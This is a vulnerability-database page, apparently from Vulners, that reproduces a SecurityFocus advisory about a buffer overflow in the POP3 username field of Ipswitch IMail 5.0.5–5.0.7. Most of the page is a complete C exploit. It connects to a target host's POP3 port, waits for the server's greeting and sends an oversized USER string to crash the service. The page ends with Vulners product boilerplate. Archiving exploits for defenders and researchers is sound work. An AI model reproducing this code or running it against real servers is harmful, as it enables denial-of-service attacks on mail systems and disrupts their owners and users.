Vulners
Lucene search
Ipswitch IMail 5.0.5/5.0.6/5.0.7 POP3 Buffer Overflow Denial of Service
source: http://www.securityfocus.com/bid/789/info
There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine.
Exploit (by Interrupt):
/*
* IMAIL 5.07 POP3 Overflow
* By: [email protected]
*
* Demonstrates vulnerability
*/
#include <stdio.h>
#include <string.h>
#ifdef WINDOWS
#include <windows.h>
#include <winsock.h>
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#endif
#ifndef WINDOWS
#define SOCKET_ERROR -1
#define closesocket(sock) close(sock)
#define WSACleanup() ;
#endif
char overflow[] =
"USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";
int main(int argc, char *argv[])
{
#ifdef WINDOWS
WSADATA wsaData;
#endif
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
char *hostname;
unsigned short port;
if (argc <= 1)
{
printf("IMAIL POP3 Overflow\n");
printf("By: [email protected]\n\n");
printf("Usage: %s [hostname] [port]\n", argv[0]);
printf("If port is not specified we use '110'\n");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("110");
printf("IMAIL POP3 Overflow\n");
printf("By: [email protected]\n\n");
#ifdef WINDOWS
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
#endif
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
/* Check to see if we get a +OK error code. If so then proceed. */
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
}
buf[bytes] = '\0';
check = strstr(buf, "+OK");
if (check == NULL)
{
printf("ERROR: NO +OK response from inital connect\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
{
printf("ERROR: Send Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Sent.\n");
closesocket(sockfd);
WSACleanup();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1